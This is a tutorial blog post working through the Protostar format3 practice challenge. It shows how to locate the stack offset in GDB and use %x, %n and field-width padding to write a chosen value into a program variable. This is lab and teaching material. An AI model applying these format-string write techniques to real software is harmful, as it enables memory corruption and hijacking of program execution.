During our last adventure into the realm of format string exploitation, we learned how we can manipulate format specifiers to rewrite a program's memory with an arbitrary value. While that's all well and good, arbitrary values are boring. We want to gain full control over the values we write, and today we are going to learn how to do just that.
Before we continue, let's go back over what format strings are and how we can manipulate them. In the C programming language, a format string looks something like this:
printf( "We have %d dogs", 2 );
And will output something like this:
We have 2 dogs
In practice, format strings are a handy way for programmers to organize the concatenation of strings and variables. Let's take a look at a more complicated format string:
char *person1 = "Bob";
char *person2 = "Alice";
int books = 15;
printf("%s and %s have %d books", person1,person2,books);
The format string is on the bottom line. Here we can see two symbols that should stick out as odd: %s and %d. These are format specifiers. When a running program comes across a format specifier, it knows to expect a variable to be passed in as a substitute for that format specifier. In the above example, the variables being substituted into the string are person1, person2, and books.
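For readers following along in Python, the same substitution can be sketched with Python's printf-style `%` operator. This is only an analogue of the C snippet above, not part of the challenge itself:

```python
# Python's % operator follows the same %s / %d conventions as C's printf.
person1 = "Bob"
person2 = "Alice"
books = 15

# Each specifier is replaced, in order, by the matching value in the tuple.
line = "%s and %s have %d books" % (person1, person2, books)
print(line)  # Bob and Alice have 15 books
```

Unlike C, Python raises an error when there are more specifiers than values, which is exactly the check the vulnerable C program lacks.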
While format strings are indeed convenient, they are not always safe. If an attacker gives a format specifier as input to a program which doesn't properly sanitize that input, the program could be manipulated to read or write its own memory when it isn't supposed to. An attacker could potentially hijack execution of the entire program.
If you're still a little fuzzy on what exactly a format string is, pop back over to our last article on format string exploitation. There, you'll find a much more complete explanation and a practice lab you can follow along with.
Once you've re-familiarized yourself with format strings, it's time to once more embark into the war-torn world of Protostar. For those of you who are new to this exploit development series, Protostar is a virtual machine which we use to practice writing exploits.
After Protostar is all set up, it's time to dive into the format3 challenge hosted on the virtual machine. As always, the first thing we should do is take a look at the source code available at Exploit Exercises:
As we've seen in previous challenges, an integer variable called "target" is defined. I'd bet every dime I have that modifying this variable is going to have something to do with our objective in this challenge. Looking at line 21, this is confirmed. We seem to be tasked with using a format string exploit to make the target variable hold the value 0x01025544.
Unlike the last challenge we walked through, this time we need to write a very specific value to the program memory. We'll worry about that part later though. For now, let's just focus on being able to write anything to memory.
The first thing we need to do is SSH into the virtual machine. This can be done with the username user and the password user. Once we're logged in, we'll open up the nano text editor by typing the following:
After that, we'll build a skeleton for our exploit by typing the code seen in the screenshot below.
Let's break this code down line by line.
- The first line is somewhat optional. All it does is let the operating system know that if it wants to execute this file, it needs to do so with Python. If you choose to omit this line, you can only run the program by typing python exploit.py in the command line.
- The next two lines import a couple of modules that we will want to use, os and struct. The os module allows us to make system calls and run the format3 program from within our code. This way, we'll be able to start the vulnerable program and pass it our exploit code all from one place. The struct module allows us to pack numbers, such as the address of a variable, into raw bytes that the vulnerable program will read correctly.
- Jumping down a couple lines, the next thing we do in the program is define a main function that will run. Putting our exploit code into a function is optional, but recommended. Storing our exploit in a function helps to keep things organized and makes our exploit easy to call from other Python scripts.
- Inside of the function, we create a new variable called payload. This is the variable we will use to store our final exploit code. We give it an initial value of AAAA so that the payload is easy to find once we start trying to figure out where in memory that information is stored.
- On the next line, you'll find an arcane symbol, %x. Like %s or %d, %x is a format specifier. As we saw in the last article, %x allows us to read program memory that we shouldn't be able to. While the other two aforementioned format specifiers also allow us to read program memory, %x presents the memory data in the most usable format. We add four copies of this format specifier to the payload so that we can figure out where in memory the program begins grabbing information to substitute into the string. Once we know where in memory this is occurring, we can determine how far we need to take that process in order to arrive at the memory location we want to be at.
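The skeleton described in the list above might be sketched roughly as follows. The original listing isn't reproduced here, so treat this as an approximation: the function name `build_payload`, the `.` separators (taken from the string we type into GDB later), and the choice to write the payload to standard output rather than launch format3 directly are all assumptions. It is also written for Python 3, which is why the payload is a byte string.

```python
#!/usr/bin/env python3
import os
import struct  # not used yet; needed later to pack the target address


def build_payload(specifier_count=4):
    """Return an easy-to-spot marker followed by a run of %x specifiers."""
    payload = b"AAAA"                     # shows up in memory as 0x41414141
    payload += b".%x" * specifier_count   # each %x leaks one stack word
    return payload


def main():
    # Assumption: we emit the payload on stdout (file descriptor 1) so it
    # can be piped into the vulnerable program's standard input.
    os.write(1, build_payload() + b"\n")


if __name__ == "__main__":
    main()
```

Keeping the payload construction in its own function makes it easy to change the number of specifiers later without touching the code that delivers it.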
As I mentioned in our last excursion into format strings, this sort of exploitation can seem very abstract at first. Don't worry, I promise that we'll lead you to the ... well ... the promised land. It just may take a little time.
In order to successfully take advantage of a format string exploit, we need to know two pieces of information: First, we need to know where our malicious format specifiers begin reading the memory. Once we know where we're starting, we need to figure out where in memory we are trying to get to. Once we know these two things, we can determine what it will take to get from point A to point B.
With this in mind, let's fire up the GNU debugger (GDB). To do this we type:
Once GDB has finished starting up, the first thing we need to do is set a breakpoint. A breakpoint marks a line of code where GDB will pause execution so that we can inspect the program's state. Looking at the source code, line 20 seems to be a good candidate, because GDB will stop there just after the vulnerable function call on line 19 has finished executing. To set this breakpoint, we type:
With the breakpoint in place, we're ready to run the program. In order to run the program from within GDB, we type the following:
If you've read our previous articles on exploit development, this command may seem a bit barren. In the past, the run command has been accompanied by an argument specifying what input we wanted to pass into the program. This isn't how we pass input to the format3 program though. Instead of accepting a command line argument as input, format3 uses the fgets function to read user input. In this case, fgets plays a role similar to Python's input function, which reads user input once the program has already begun execution.
Once the program is running, we'll see an empty prompt where we can enter whatever we want to be processed by the program. In this case, the string we'll be typing is AAAA.%x.%x.%x.%x. Once you finish typing that, hit Enter. At this point, your screen should look something like this:
Here we can see that we've hit the breakpoint we set earlier. The most interesting line is the first one below the string we typed. The line AAAA.0.bffff5c0.b7fd7ff4.0 has the information that we're going to need in order to figure out where in memory the format specifiers begin reading at. Now that we have that information, it's time to go hunting!
We'll start our prowl through these cyber woods with the current stack frame. If we're lucky, we'll find the same byte sequence in the stack frame as we saw printed by the program. Essentially, we're trying to find where in memory the sequence 0.bffff5c0.b7fd7ff4.0 appears.
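To make the hunt a little easier, the leaked line can be split into the individual words we expect to find sitting next to each other in memory. The helper name `parse_leak` is hypothetical, and the sketch assumes the `.` separators used in the string we typed:

```python
def parse_leak(line, marker="AAAA"):
    """Split output such as 'AAAA.0.bffff5c0' into a list of integers."""
    fields = line.strip().split(".")
    if fields[0] != marker:
        raise ValueError("marker not found at start of output")
    # Every remaining field is one stack word printed by a %x specifier.
    return [int(field, 16) for field in fields[1:]]


leak = parse_leak("AAAA.0.bffff5c0.b7fd7ff4.0")
print([hex(word) for word in leak])
# ['0x0', '0xbffff5c0', '0xb7fd7ff4', '0x0']
```

These four values, in this order, are what we need to spot in GDB's memory dump.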
To check the current stack frame, we type the following command:
x/32x $esp
The first x is short for "examine," which is fitting, since this command lets us examine memory. The /32 specifies that we want to examine 32 units of memory, which GDB treats as four-byte words by default. The x after the 32 tells GDB that we want to view this section of memory in hexadecimal format. The last term, $esp, tells the command to start at the address held in the stack pointer, which is the top of the current stack frame. Let's see what output we get from this command:
Aha! There's that rascal ... wait. It seems that the beast has eluded us thus far. While we see one of the memory sections we are looking for, the next two don't match. We are looking for 0.bffff5c0.b7fd7ff4.0 exactly in that order, with nothing in between.
What we do see, however, is the string itself. The value 0x41414141 is the hexadecimal representation of the four As we had at the beginning of our string. If we remember from our last excursion, in order to exploit a format string vulnerability, we need the program to begin reading memory at a lower address than where the string itself is stored. In this case, we see that the string is stored at 0xbffff5c0 (where the four As are), which means that the sequence we're looking for has to come before this address. With this in mind, let's start picking through the lower memory addresses and see what we find. In order to do this, we'll type the following:
This command is nearly identical to the last command we ran. The only difference is that instead of reading 32 4-byte chunks of memory starting at the memory address of esp (also known as the stack pointer), we are starting at the address of esp minus 32 bytes. This means we'll be examining memory starting 32 bytes before the address of the stack pointer. Running this command results in the following output:
There it is! Our arduous search has paid off. We have found our prey. The format specifiers start reading at the location 0xbffff590. That is 0x30 (48) bytes, or 12 four-byte sections of memory, before our beloved As. This means we need 12 format specifiers in order to read memory we have the ability to write to.
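The distance between the two addresses is easy to double-check. This small sketch uses only the addresses quoted above; the variable names are made up for illustration, and the four-byte word size assumes the 32-bit x86 environment Protostar provides:

```python
WORD_SIZE = 4  # bytes per stack slot on 32-bit x86 (assumption stated above)

first_read = 0xbffff590    # where the format specifiers start reading
buffer_start = 0xbffff5c0  # where our AAAA marker is stored

distance = buffer_start - first_read
words = distance // WORD_SIZE
print(distance, words)  # 48 12
```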
Before we exit GDB, there's one more thing we need to know. In order to overwrite the contents of the target variable, we need to know where the heck that variable even is. To do this, we'll type:
The output of that command will show us the address of the target variable.
From the above output, we can see that the address of "target" is 0x80496f4. If we use the x command to examine this piece of memory, we see the current value at that memory address is 0. This is exactly what we would expect: "target" isn't given a value when it is declared in the source code, and C initializes such global variables to zero.
Now that we have these two key pieces of information, the number of format specifiers we need and the address of the target variable, we can finish our exploit. Let's knock this bad boy out.
Let's open our exploit back up by typing the following:
The first thing we need to do is change the number of format specifiers that we're putting into our payload. Currently, we're only putting four format specifiers into the payload. We need to be building 12 into the payload. After we change this, our exploit should look something like this:
It's pretty much the same. We really don't want to change too much at one time though. This approach is called incremental development. The idea is that by coding and testing in small increments, we can minimize the number of mistakes we make. While this may seem inefficient, it is significantly faster than trying to program a massive chunk of a project, making a mistake, and trying to dig through and find the mistake later.
Let's save our exploit as is and run it. We should see the following output:
Sweet. Just as we were hoping, the last format specifier read the very beginning of our payload. That isn't useful while the beginning of our payload is just a bunch of As, though. As nice as a bunch of As can be, they don't do us much good when it comes to overwriting memory addresses.
So, what we need to do next is change our As to the address of target we found earlier. This can be easily done with the pack function in the struct package. By using this function, we can put the address of target into our payload in a format that the program can read correctly. Let's open up our exploit file again and make this change.
The change comes on line 7 with the struct.pack function. The first argument of struct.pack specifies that we want to package the information as an unsigned integer. We don't really need to worry about that too much, but it's good to know why we're doing what we're doing. The second argument is the information that we want to package. The struct.pack function returns a string, which we then append to the payload string variable.
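Here is a minimal sketch of what that packing step produces. The `"<I"` format string (little-endian unsigned 32-bit integer) is an assumption that matches the x86 byte order; the original listing may spell the format differently. In Python 3, `struct.pack` returns a `bytes` object rather than a string:

```python
import struct

TARGET_ADDRESS = 0x080496f4  # address of target reported by GDB

# "<I" = little-endian, unsigned 32-bit integer (assumed format string).
packed = struct.pack("<I", TARGET_ADDRESS)
print(packed)  # b'\xf4\x96\x04\x08'

# The packed address takes the place of the AAAA marker.
payload = packed + b".%x" * 12
```

The bytes come out in reverse order because x86 stores the least significant byte first, which is why typing the address by hand is error-prone.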
Let's exit out and see what happens when we run the program now:
As we had prayed would happen, the last memory address we read is the address of the target variable, 0x80496f4.
Now that we know that the last piece of data we're reading contains the address of the target variable, we can move on to writing data.
The way we do this is with the %n format specifier. Like the %x format specifier, the %n format specifier consumes a piece of data from memory. Unlike %x, %n does not display the data that it reads. Instead, it writes the number of characters printed so far. Where does this number get written to? Why, to the address given by the value that was read, of course.
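To make that behaviour concrete, here is a toy model of how printf walks a format string. It is a deliberately simplified sketch, not how a real C library is implemented: `toy_printf` is a hypothetical helper that understands only `%x`, `%<width>x`, and `%n`, tracks the output length instead of building the output, and uses a dictionary to stand in for writable memory.

```python
import re

SPEC = re.compile(rb"%(\d*)([xn])")


def toy_printf(fmt, stack_words, memory):
    """Model the character count and %n writes for a format string."""
    printed = 0  # characters "printed" so far
    pos = 0      # position in fmt after the previous specifier
    for arg_index, match in enumerate(SPEC.finditer(fmt)):
        printed += match.start() - pos  # literal text before the specifier
        pos = match.end()
        word = stack_words[arg_index]   # next word taken from the stack
        width, kind = match.groups()
        if kind == b"x":
            # A width is a minimum: short values are padded up to it.
            printed += max(len("%x" % word), int(width or 0))
        else:
            # %n treats the word as an address and stores the count there.
            memory[word] = printed
    return printed + len(fmt) - pos


memory = {}
toy_printf(b"AB%x.%n", [0xff, 0x1000], memory)
print(memory)  # {4096: 5}
```

In the example, `AB`, `ff`, and `.` account for five characters, so the value 5 lands at the "address" 0x1000 that `%n` pulled off the stack.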
Essentially this means that if we want to write data to the value of the target variable, we need the %n format specifier to read a chunk of memory with the address of that variable. Our exploit should look something like this now:
In this version of the exploit, we replace the last %x format specifier with a %n format specifier. Now, instead of simply printing the address of the target variable to the screen, this exploit should grab the address of the target variable and write some data to that address. Let's see if it works:
Alright! Now we're cooking with peanut oil. While we still have a frowny face, we are on the cusp of turning said frown upside down. We've managed to write some data to the target variable. Instead of having a value of 0, we now have a hexadecimal value of 4c. This is still a long way away from 01025544 though. If we do 0x01025544 - 0x0000004c, we get a decimal value of 16930040. This means that we need our string to be 16930040 characters longer in order to write the correct value. That sure is a lot of As.
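The subtraction is worth checking rather than trusting to mental hexadecimal. The variable names below are just for illustration:

```python
desired = 0x01025544  # value we want target to hold
current = 0x4c        # value target holds after our first %n write

extra = desired - current
print(desired, current, extra)  # 16930116 76 16930040
```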
Luckily, there's a more elegant solution. Instead of adding payload+="A"*16930040 to our program, we can do this:
The change should be fairly obvious. Our last %x format specifier went from being %x to %16930040x. A number between the % and the conversion letter sets the minimum field width, which determines how much padding is printed with the variable. For instance, the following code would print out "Hello Steve" with five extra spaces between "Hello" and "Steve."
char *person = "Steve";
printf("Hello %10s", person); /* pads the 5-character name to a width of 10 */
These extra padding characters are counted as a part of the length of the string. This means that by padding the last %x format specifier with 16930040, it should give us the correct string length we need to write "01025544" to the target variable. Let's try it out!
Well, we're certainly a lot closer. It looks like we still need 8 more bytes in our string to get to the magic number. This is because we set the last format specifier to have a total length of 16930040 bytes. That format specifier was already giving us a string that is 8 bytes long. This means we were only adding 16930032 bytes to the length of the entire string. Oops. This is an easy fix though. All we have to do is change %16930040x to %16930048x. This will give us the correct number of bytes to overwrite the target variable with the value we want.
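The off-by-eight is easier to see in code. A field width is a minimum, so it replaces the characters the specifier was already printing instead of adding to them. In this sketch the variable names are hypothetical, and 0xb7fd7ff4 is used only as an example of an eight-digit value like the one the last %x printed:

```python
desired = 0x01025544         # value target must hold
count_before_padding = 0x4c  # what %n wrote with plain %x specifiers
unpadded_len = 8             # characters the last %x already printed

# Padding an 8-character value to width 20 adds only 12 characters.
example = "%20x" % 0xb7fd7ff4
print(len(example))  # 20

# So the width must cover the shortfall plus the 8 characters it replaces.
width = desired - count_before_padding + unpadded_len
padded_spec = b"%" + str(width).encode() + b"x"
print(width, padded_spec)  # 16930048 b'%16930048x'
```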
And just like a mediocre comedian, we were able to turn that frown into a vaguely approving smile.
Despite the anticlimactic response from the program, the implications of format string vulnerabilities can be quite damaging. In this particular example, all we did was overwrite a variable. However, we could very easily use this sort of vulnerability to overwrite the program's instruction pointer to execute shellcode like we did when we worked through the stack overflow challenges. Format string vulnerabilities have the potential to be just as dangerous as stack overflow vulnerabilities.
Thank you for reading! Congratulations on making it through the slow grind of format string exploitation. Being able to think through these kinds of problems will really help your critical thinking in all areas of computer science, so good on you. Comment below with any questions or contact me via Twitter @xAllegiance.